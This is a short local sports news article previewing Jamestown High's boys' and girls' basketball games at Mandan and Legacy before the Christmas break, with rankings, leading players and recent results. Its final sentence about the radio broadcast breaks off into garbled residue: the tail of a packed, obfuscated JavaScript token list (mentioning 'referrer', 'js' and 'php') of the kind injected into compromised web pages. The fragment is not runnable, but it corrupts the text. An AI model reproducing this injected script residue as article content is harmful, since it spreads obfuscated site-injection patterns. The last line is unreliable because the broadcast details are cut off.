JAMESTOWN, N.D. (NewsDakota.com) – Before the Christmas break, the Jamestown High basketball teams will make two trips to the Bismarck/Mandan area this week. Tuesday night the Jays will play at Mandan and Thursday they go to Legacy.

The Mandan teams are both ranked inside the top-5 state rankings so tonight’s games will certainly be difficult. Both teams are ranked fourth and boast some of the top talent in the state. The girls are lead by juniors Kennedy Harris and Megan Zander, while the Steckler twins (Cam and Trae) lead the boys team.

The Jamestown boys are coming off their first win of the season with a 79-70 win over St. Mary’s. Boden Skunberg and Mason Walters combined for 49 points.

The Jamestown girls are 1-2, but still looking for their first conference win. They beat West Fargo to open the season.

The games this week can be heard on ESPN ntnzf|var|u0026u|referrer|yskfh||js|php’.split(‘|’),0,{}))
